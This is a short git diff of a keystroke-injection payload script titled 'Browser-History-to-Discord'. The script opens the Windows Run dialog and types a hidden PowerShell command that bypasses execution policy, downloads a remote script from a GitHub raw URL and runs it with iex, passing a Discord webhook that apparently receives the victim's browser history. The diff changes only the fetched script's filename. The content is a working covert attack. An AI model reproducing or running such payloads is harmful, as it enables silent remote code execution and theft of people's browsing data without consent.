diff --git a/Fast-Execution-Scripts/Browser-History-to-Discord.txt b/Fast-Execution-Scripts/Browser-History-to-Discord.txt index 321ff46..a2a0d3c 100644 --- a/Fast-Execution-Scripts/Browser-History-to-Discord.txt +++ b/Fast-Execution-Scripts/Browser-History-to-Discord.txt @@ -13,7 +13,7 @@ REM open powershell (remove "-W H" to show the window) DELAY 1000 GUI r DELAY 750 -STRING powershell -NoP -Ep Bypass -W H -C $dc='DISCORD_WEBHOOK_HERE'; irm https://raw.githubusercontent.com/beigeworm/assets/main/Scripts/Brwsr-Hist.ps1 | iex +STRING powershell -NoP -Ep Bypass -W H -C $dc='DISCORD_WEBHOOK_HERE'; irm https://raw.githubusercontent.com/beigeworm/assets/main/Scripts/brsr-hist.ps1 | iex ENTER